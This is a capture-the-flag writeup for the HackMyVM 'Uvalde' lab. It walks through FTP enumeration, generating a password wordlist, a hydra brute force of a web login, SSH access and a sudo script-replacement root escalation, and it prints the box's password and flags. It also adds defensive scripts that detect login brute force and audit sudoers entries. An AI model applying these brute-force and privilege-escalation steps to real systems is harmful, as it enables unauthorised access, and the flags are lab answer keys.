HackMyVM-Uvalde Box Writeup
城南花已开 Lv5

Information Gathering

Service Detection

Scan for the target IP

```
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:3a:91:cf (Unknown)
192.168.56.114 08:00:27:65:8d:c9 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.844 seconds (138.83 hosts/sec). 3 responded
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.56.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 03:30 EDT
Nmap scan report for 192.168.56.114
Host is up (0.00036s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:65:8D:C9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
```

Run nmap first.

There is an FTP service, so try logging in with the anonymous account and see what is there.

Running nmap -sV 192.168.56.114 here also shows that port 21 allows anonymous access.

FTP Login

```
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.56.114
Connected to 192.168.56.114.
220 (vsFTPd 3.0.3)
Name (192.168.56.114:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||25004|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 116 4096 Jan 28 2023 .
drwxr-xr-x 2 0 116 4096 Jan 28 2023 ..
-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output
226 Directory send OK.
```

Use get to download output (a text file) to the local machine.

cat shows it contains a hint: there is a Linux user named matthew.

So switch direction and look at port 80.

Scan directories with gobuster. The first run found nothing; after switching the wordlist it took a good while before results came out.

```
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 29604]
/img (Status: 301) [Size: 314] [--> http://192.168.56.114/img/]
/login.php (Status: 200) [Size: 1022]
/user.php (Status: 302) [Size: 0] [--> login.php] #
/mail (Status: 301) [Size: 315] [--> http://192.168.56.114/mail/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.114/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.114/js/]
/success.php (Status: 302) [Size: 0] [--> login.php] #
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.114/vendor/]
/create_account.php (Status: 200) [Size: 1003] #
Progress: 39458 / 622932 (6.33%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 39474 / 622932 (6.34%)
===============================================================
Finished
===============================================================
```

The useful findings are marked with #.

When I created an account through /create_account.php, only a username was required. Where is the password??? I was stuck for a while; then I looked at the success response and saw a parameter that looked base64-encoded.

```
┌──(kali㉿kali)-[~]
└─$ echo -n "dXNlcm5hbWU9dGVzdDEmcGFzc3dvcmQ9dGVzdDEyMDI0QDk0MzQ=" |base64 -d
username=test1&password=test12024@9434
```

OK, logged in, and the result...

The username found earlier has not been used yet. matthew's web password may well be the same as his SSH password, so brute-forcing the login.php page should be enough.

Blind brute force is not realistic, though: with symbols and mixed-case letters it would not finish in a year. But from the account creation above, the password clearly follows a format.

Password Generation

username2024@xxxx, where the last four digits appear to be generated at random.

That makes it simple: the password is matthew@2024????.

Use crunch to generate the passwords (a Python script also works, see below).

```
┌──(kali㉿kali)-[~]
└─$ crunch 16 16 -t matthew@2024%%%% >pass.list
## After cat-ing the list I found it never produced the @ symbol, only z; -l has to be added
┌──(kali㉿kali)-[~]
└─$ crunch 16 16 -t matthew2024@%%%% -l aaaaaaaaaaa@aaaa>pass.list
## This one works
## For what the parameters mean, just ask GPT
```

Explanation:

  • `16 16` sets the generated password length to 16 characters.

  • `-t matthew2024@%%%%` defines the password template, where:

    - `matthew2024@` is the fixed part.
    - `%%%%` is the variable part, standing for 4 random digits.

  • `-l aaaaaaaaaaa@aaaa` specifies the type of each position in the template:

    - `a` stands for a letter (lower or upper case).
    - `@` stands for the fixed special character `@`.
    - the `aaaa` after it marks the four digit positions.

In this case the -l parameter does not really add much extra control, because the template already specifies the type of every character. Using -l does improve readability and helps make the role of each part of the password pattern explicit. It becomes more useful in more complex generation scenarios, for example when mixing upper-case and lower-case letters, digits and special characters.

A Python script works too:

```python
user = 'matthew2024@'

with open('test.txt', 'w') as f:
    for num in range(10000):                  # 0000 to 9999, so the 0000 suffix is not skipped
        correct_num = str(num).zfill(4)       # zfill pads with zeros on the left
        f.write(user + correct_num + '\n')    # concatenate, add a newline, write to test.txt
```

HTTP Brute Force

Then came the brute force. I used Burp Suite; hydra works as well, but I find Burp suits me better.

Burp finished quickly but could not find the password. Only after reading another writeup did I learn that this box is from 2023: the year changed but the password did not, haha.

Doing this box in 2024, the year-based guess no longer works; you have to go with the original password.

matthew2023@1554

Turns out I have not fully figured Burp out yet.

Burp can generate the passwords directly for the attack.

Just change the payload type to Numbers and add a prefix; it finds the password just the same.

On the side, here is the hydra method for brute-forcing an HTTP form, copied from someone else's writeup.

```
┌──(kali㉿kali)-[~]
└─$ hydra -l matthew -P matth.list 192.168.56.114 http-post-form '/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-05 05:42:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.56.114:80/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">
[80][http-post-form] host: 192.168.56.114 login: matthew password: matthew2023@1554
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-05 05:42:47
## In practice hydra turned out to be more convenient; the graphical Burp is a bit laggy
```
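The hydra run above sends ten thousand POSTs to /login.php from one address in about twenty seconds, which is exactly the pattern a web server log gives away. The following detector is an added example written for this writeup, not code from the box or its author: it walks combined-format access log lines, keeps a sliding window of login POSTs per client IP, and raises an alert once an IP exceeds a threshold inside the window, noting whether the burst ended in a redirect (the hydra command keys on the login form being absent from a successful response, so a 302 after a run of 200s is assumed to be the success). The log lines are constructed for the example; the threshold, window and the 200/302 convention are assumptions, not something the page states.

```python
"""Flag login brute-force bursts in an Apache/nginx combined-format access log."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample (not real box data): one normal login from .1, then a
# hydra-style burst from .102 that ends in a 302 on the eighth attempt.
SAMPLE_LOG = """\
192.168.56.1 - - [05/Sep/2024:05:41:50 -0400] "GET /login.php HTTP/1.1" 200 1022
192.168.56.1 - - [05/Sep/2024:05:41:58 -0400] "POST /login.php HTTP/1.1" 302 0
192.168.56.102 - - [05/Sep/2024:05:42:26 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:26 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:27 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:27 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:28 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:28 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:29 -0400] "GET /img/logo.png HTTP/1.1" 200 5120
192.168.56.102 - - [05/Sep/2024:05:42:29 -0400] "POST /login.php HTTP/1.1" 200 1022
192.168.56.102 - - [05/Sep/2024:05:42:30 -0400] "POST /login.php HTTP/1.1" 302 0
"""


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_bruteforce(lines, threshold=5, window_seconds=60, login_path="/login.php"):
    """Return {ip: alert} for every IP that sent >= threshold login POSTs within window_seconds.

    An alert counts every further POST while the burst continues and records
    whether any of them was answered with a redirect (assumed success).
    """
    windows = defaultdict(deque)   # ip -> deque of (timestamp, status) inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST" or path.split("?")[0] != login_path:
            continue
        win = windows[ip]
        win.append((ts, status))
        # Drop attempts that fell out of the sliding window (lines are in time order).
        while (ts - win[0][0]).total_seconds() > window_seconds:
            win.popleft()
        if len(win) < threshold:
            continue
        alert = alerts.get(ip)
        if alert is None:
            alert = alerts[ip] = {"attempts": len(win), "first": win[0][0],
                                  "last": ts, "success_after": False}
        else:
            alert["attempts"] += 1
            alert["last"] = ts
        if 300 <= status < 400:
            alert["success_after"] = True
    return alerts


if __name__ == "__main__":
    for ip, a in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {a['attempts']} login POSTs between {a['first']:%H:%M:%S} and "
              f"{a['last']:%H:%M:%S}, success afterwards: {a['success_after']}")
```

The window is keyed on client IP only, so a spray spread over many source addresses would need a second window keyed on the target username; the threshold of five attempts in a minute is deliberately low because a human rarely fails that often, and the real fix on the server side is rate limiting or lockout on /login.php rather than log review after the fact.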

User Flag

SSH in and grab the user flag.

```
┌──(kali㉿kali)-[~]
└─$ ssh matthew@192.168.56.114
The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established.
ED25519 key fingerprint is SHA256:S2tp/jV32/GtUP68f14Rac4/yZXhbMmyut+ZqO+ZOl4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts.
matthew@192.168.56.114's password:
Linux uvalde.hmv 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
matthew@uvalde:~$ ls
user.txt
matthew@uvalde:~$ cat user.txt
6e4136fbed8f8c691996dbf42697d460
```

Root Privilege Escalation

Sudo Escalation

sudo -l shows a script that may be run as root, and its directory is readable, writable and executable by other users, so simply delete superhack and write a new one in its place.

```
matthew@uvalde:/opt$ sudo -l
Matching Defaults entries for matthew on uvalde:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User matthew may run the following commands on uvalde:
(ALL : ALL) NOPASSWD: /bin/bash /opt/superhack   ## may run bash with superhack
matthew@uvalde:~$ rm -rf /opt/superhack
matthew@uvalde:/opt$ echo -n "bash"> superhack
matthew@uvalde:/opt$ sudo /bin/bash /opt/superhack
root@uvalde:/opt# cd ~
root@uvalde:~# ls
root.txt
root@uvalde:~# cat root.txt
59ec54537e98a53691f33e81500f56da
```
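The rule itself is not the problem here; what makes it fatal is that /opt lets any user replace the script it points at. The checker below is an added example for this writeup, not code from the box or its author: it parses a `sudo -l` entry of the form shown above, works out which path actually runs as root (the script when the command is an interpreter, the binary otherwise), and reports whether that file or its parent directory is group- or world-writable without the sticky bit. It generalises past the page's single entry to any interpreter-plus-script rule. The interpreter list and the finding messages are the example's own assumptions, and the demo builds a throwaway directory rather than touching /opt.

```python
"""Audit a sudoers NOPASSWD entry for a target script that unprivileged users can replace."""
import os
import re
import shutil
import stat
import tempfile

# Assumed list: interpreters whose first argument is the script that really runs as root.
INTERPRETERS = {"/bin/bash", "/bin/sh", "/usr/bin/bash", "/usr/bin/sh",
                "/usr/bin/python3", "/usr/bin/perl"}

# "(ALL : ALL) NOPASSWD: /bin/bash /opt/superhack" -> command and arguments after the tags
ENTRY_RE = re.compile(r"^\([^)]*\)\s+(?:[A-Z]+:\s*)*(.+)$")


def parse_sudo_command(entry):
    """Split a sudo -l entry into argv, ignoring a trailing '#' comment."""
    m = ENTRY_RE.match(entry.split("#")[0].strip())
    if not m:
        raise ValueError(f"not a sudo -l entry: {entry!r}")
    return m.group(1).split()


def _mode(path):
    return os.stat(path).st_mode


def writable_by_others(path):
    """True if the group or world write bit is set."""
    return bool(_mode(path) & (stat.S_IWGRP | stat.S_IWOTH))


def audit_entry(entry):
    """Return a list of findings (empty means the entry's target cannot be swapped by others)."""
    argv = parse_sudo_command(entry)
    # When root runs an interpreter, the script handed to it is what matters.
    targets = argv[1:2] if argv[0] in INTERPRETERS and len(argv) > 1 else argv[:1]
    findings = []
    for target in targets:
        if not target.startswith("/"):
            findings.append(f"{target}: relative path in sudoers entry")
            continue
        parent = os.path.dirname(target)
        if not os.path.exists(target):
            findings.append(f"{target}: does not exist")
        elif writable_by_others(target):
            findings.append(f"{target}: file is group/world-writable")
        # A writable directory without the sticky bit lets anyone unlink and recreate the file.
        if os.path.isdir(parent) and writable_by_others(parent) and not (_mode(parent) & stat.S_ISVTX):
            findings.append(f"{parent}: directory is group/world-writable without sticky bit, "
                            f"so {target} can be replaced")
    return findings


def demo():
    """Reproduce the misconfiguration on a throwaway directory and return findings per state."""
    tmp = tempfile.mkdtemp(prefix="sudo-audit-")
    try:
        script = os.path.join(tmp, "superhack")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho 'placeholder script'\n")   # constructed stand-in
        entry = f"(ALL : ALL) NOPASSWD: /bin/bash {script}"
        results = {}
        os.chmod(tmp, 0o777)        # the /opt mistake from the box
        os.chmod(script, 0o644)
        results["writable_dir"] = audit_entry(entry)
        os.chmod(tmp, 0o755)        # directory fixed...
        os.chmod(script, 0o666)     # ...but the script itself left world-writable
        results["writable_file"] = audit_entry(entry)
        os.chmod(script, 0o644)     # both fixed: only the owner can write
        results["fixed"] = audit_entry(entry)
        return results
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for state, findings in demo().items():
        print(f"{state}: {findings or 'no findings'}")
```

On a real host you would feed it every command line from `sudo -l` output (or parse /etc/sudoers and /etc/sudoers.d as root); the checks are mode-bit based, so a file the invoking user owns outright will also need an ownership check before the entry is called safe.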

Done. Even this easy box took me two hours; clearly there is still a long road ahead.
